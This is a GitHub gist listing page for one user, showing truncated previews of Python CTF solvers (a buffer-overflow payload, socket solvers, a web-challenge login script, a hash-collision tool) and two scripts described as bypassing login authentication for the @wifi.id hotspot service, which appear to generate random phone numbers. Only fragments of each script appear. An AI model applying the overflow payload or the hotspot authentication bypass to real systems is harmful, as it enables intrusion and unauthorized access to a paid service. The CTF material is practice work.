Skip to content

Instantly share code, notes, and snippets.

View budanthara's full-sized avatar
🏠
Working from home

Ida Bagus Budanthara budanthara

🏠
Working from home
  • Indonesia
View GitHub Profile
# IDSECCONF2015 - IMFTest ( Misc 250pts )
# Solver by snoww0lf - Noobs1337
import socket
import re
import sys
import numpy as np
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('128.199.218.190', 17845))
# IDSECCONF2015 CTF - Easy Exploit ( 100pts )
# snoww0lf - Noobs1337
import socket
sc = ""
sc += 'A'*136
sc += '\x16\x06\x40'
sc += '\x00'*10
# IDSECCONF2015 CTF - Debugme ( Reversing 100pts )
# snoww0lf - Noobs1337
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('128.199.218.190', 15178))
data = ['0x6a', '0x6f', '0x6b', '0x6f', '0x6f', '0x6f', '0x21']
send_data = ''.join(data).replace("0x", "").decode("hex")
flag = ''
import urllib, urllib2
import re
# CSAW CTF 2015 - Solving Lawn Care Simulator 2015 ( Web 200pts )
# To analyze the php syntax, just clone the git. http://54.165.252.74:8089/.git/
# snoww0lf
def login():
url = "http://54.165.252.74:8089/premium.php"
params = {
@budanthara
budanthara / search.py
Created November 5, 2015 12:38
SchoolCTF 2015 PPC 200
def search():
flag = ''
start = 'start.txt'
st = True
while st:
with open(start, 'r') as f:
x = f.readlines()
c = x[0]
start = c[6:].replace("\n", "")
print "Membaca file %s " % (start)
"""
HackDatKiwi CTF 2015 - Phone Lock 1
"""
import hashlib
import random
salt = "abb6f243fb340025d312c2a41cfa8beb"
valid = "00a1e1072212ceae0445dcffde045da4"
@budanthara
budanthara / wisely.py
Created December 11, 2015 14:48
Wisely Bit
import string
cipher = "233 129 9 5 130 194 195 39 75 229"
def decode():
flag = ""
strs = string.letters + "0123456789" + "{}_~*&^%$#@!()-"
to_list = ' '.join(strs).split(' ')
user_str = []
for char in strs:
@budanthara
budanthara / badboy.py
Last active April 27, 2016 18:08
...
# Usage: python filename.py originalfile collisionfile
# snoww0lf
import sys
from hashlib import *
coll_find = [19, 45, 59, 83, 109, 123]
d_out = []
def to_hex_conversion(data):
@budanthara
budanthara / @wifi.id_bypass.py
Last active December 27, 2022 13:30
Buat bypass autentikasi login @wifi.id
"""
@WIFI.ID BYPASS WITH PYTHON
Cara menggunakan:
- Install python.
- Install library mechanize.
- Jalankan dengan perintah: python namafile.py
- Tunggu dan silahkan mencoba untuk browsing.
"""
@budanthara
budanthara / @wifi.id_bypassv2.py
Last active September 30, 2020 07:31
@wifi.id bypass v2
import os
import mechanize
import urllib
import urllib2
import re
import json
def rand_gen_phone():
phone = '081'
for i in range(9):